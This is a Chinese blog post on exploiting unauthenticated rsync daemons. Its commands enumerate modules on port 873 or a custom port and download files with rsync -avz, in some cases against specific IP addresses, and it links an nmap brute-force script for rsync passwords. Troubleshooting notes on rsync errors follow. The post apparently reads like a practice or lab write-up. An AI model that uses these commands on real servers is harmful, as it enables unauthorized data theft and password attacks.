我喜欢SEO、网络营销及建站,希望与志同道合的您
建立合作或相互学习关系 QQ:10343829

rsync 存在漏洞的版本和使用方法

1. 查看哪些版本存在漏洞: 在kali中输入命令:   searchsploit rsync

该漏洞存在于 873 端口

2. 测试漏洞是否存在: 在kali中输入:  rsync 59.188.219.28::    

 

 

 

 

 

进入 指定目录 rsync 59.188.219.28::wwwroot

报错:如下图,证明,密码是错的。默认密码 “::” 不对

 

 

3. 总结: 其实主要知道几条命令就行了

rsync IP::   //这是在默认条件下没有改变默认的端口,默认密码是::
rsync --port=xxx ip::  //如果修改了默认端口就需要指定端口,这里就是需要自己指定47900端口
rsync -avz ip::www /tmp   //-avz是下载文件的命令,前一个是目标内容,后一个是自己指定存储在本地的路径
rsync -avz --port=xxx ip::dddd /tmp

4. 接下来直接尝试使用rsync连接啦

rsync --port=47900 219.153.49.228::
rsync --port=47900 219.152.49.228::volume
rsync --port=47900 219.153.49.228::volume/key_1913718524583.php /tmp

5. 如果不rsync不是默认密码,那么可以使用  rsync-brute :https://svn.nmap.org/nmap/scripts/rsync-brute.nse 暴力破解脚本

3. 使用过程中常见的错误:

rsync 常见错误与解决方法整理 – 半前端半设计的四不像 – 博客园

问题一:
@ERROR: chroot failed
rsync error: error starting client-server protocol (code 5) at main.c(1522) [receiver=3.0.3]
原因:
服务器端的目录不存在或无权限,创建目录并修正权限可解决问题。

rsync 常见错误与解决方法整理 – 半前端半设计的四不像 – 博客园

问题二: 
@ERROR: auth failed on module tee
rsync error: error starting client-server protocol (code 5) at main.c(1522) [receiver=3.0.3]
原因:
服务器端该模块(tee)需要验证用户名密码,但客户端没有提供正确的用户名密码,认证失败。
提供正确的用户名密码解决此问题。

rsync 常见错误与解决方法整理 – 半前端半设计的四不像 – 博客园

问题三: 
@ERROR: Unknown module ‘tee_nonexists’
rsync error: error starting client-server protocol (code 5) at main.c(1522) [receiver=3.0.3]
原因:
服务器不存在指定模块。提供正确的模块名或在服务器端修改成你要的模块以解决问题。

转载请著名来源:天天小站 » rsync 存在漏洞的版本和使用方法

分享到:更多 ()